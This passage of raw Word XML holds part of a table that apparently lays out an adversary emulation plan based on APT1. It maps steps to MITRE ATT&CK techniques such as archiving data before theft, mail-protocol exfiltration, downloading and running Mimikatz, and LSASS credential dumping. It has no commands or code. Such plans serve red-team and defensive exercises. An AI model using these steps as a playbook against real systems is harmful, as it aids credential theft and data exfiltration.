                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEC5E8A" w14:textId="317F9691" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="00BF4FDA" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F37F4C" w14:textId="0B898259" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1560</w:t>
            </w:r>
            <w:r w:rsidR="00DE1C01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>.00</w:t>
            </w:r>
            <w:r w:rsidR="0038284F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BF4FDA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Archive Collected Data</w:t>
            </w:r>
            <w:r w:rsidR="0038284F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> : </w:t>
            </w:r>
            <w:r w:rsidR="0038284F" w:rsidRPr="0038284F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Archive via Utility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69672BB2" w14:textId="3AEA763A" w:rsidR="004046A1" w:rsidRDefault="00592C17" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3604487F" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D5DFB23" w14:textId="06B0B856" w:rsidR="004046A1" w:rsidRDefault="00592C17" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79786718" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B180DD0" w14:textId="4EDD824C" w:rsidR="004046A1" w:rsidRDefault="00BF4FDA" w:rsidP="00DD2D38">
            <w:r w:rsidRPr="004046A1">
              <w:t xml:space="preserve">[1] Completing </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004046A1">
              <w:t>The</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004046A1">
              <w:t xml:space="preserve"> Mission. </w:t>
            </w:r>
            <w:r>
              <w:t>they pack them into archive files before stealing them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004046A1" w:rsidRPr="003E52D1" w14:paraId="79D26B23" w14:textId="77777777" w:rsidTr="00DD2D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="716E7D64" w14:textId="3AD8BFC1" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B13DAE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36CD4B02" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CC351EE" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol: </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64EE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Mail Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C2B1F3B" w14:textId="0B5171B2" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00592C17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D59F95E" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FC06A63" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63BE0645" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0368A6" w14:textId="0E53E354" w:rsidR="004046A1" w:rsidRPr="003E52D1" w:rsidRDefault="00BF4FDA" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltrate data (using this technique to mark the step)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00673453" w14:paraId="75406050" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="403E4C28" w14:textId="67906184" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B13DAE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30FC7C17" w14:textId="720F4E6D" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="613144DC" w14:textId="00123DEC" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00673453">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A2BA934" w14:textId="25FB6D5A" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00592C17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="032636C5" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C9AE5A3" w14:textId="4376D6E1" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3806FE57" w14:textId="4C4134FF" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F583042" w14:textId="7D97F93A" w:rsidR="00674213" w:rsidRPr="00673453" w:rsidRDefault="00B13DAE" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00674213" w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Download and execute </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00674213" w:rsidRPr="00673453">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="045E9409" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="620AA28D" w14:textId="00C3D48A" w:rsidR="00674213" w:rsidRDefault="00B13DAE" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D0AEB51" w14:textId="53804743" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957F1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00957F1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00957F1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36F25213" w14:textId="39AEA559" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957F1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">.001 </w:t>
            </w:r>
            <w:r w:rsidRPr="00957F1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>OS Credential Dumping: LSASS Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09437FF8" w14:textId="1DF9D33E" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00592C17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E1163CF" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0C693D" w14:textId="411E5F8A" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D90F121" w14:textId="7FBB49D5" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C7F8D5A" w14:textId="3DF8BA18" w:rsidR="00674213" w:rsidRPr="00461F9A" w:rsidRDefault="00B13DAE" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00674213" w:rsidRPr="00957F1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">APT1 has been known to use credential dumping using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00674213" w:rsidRPr="00957F1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B545B" w:rsidRPr="003E52D1" w14:paraId="53836039" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41ACB8C1" w14:textId="513A4755" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="00592C17" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A3893D7" w14:textId="5E980DC8" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="078C5CC6" w14:textId="11703ACF" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol: </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64EE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Mail Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ECFDE37" w14:textId="2DAFEAE8" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="00592C17" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778CA5FD" w14:textId="77777777" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A20961" w14:textId="4543F6E4" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
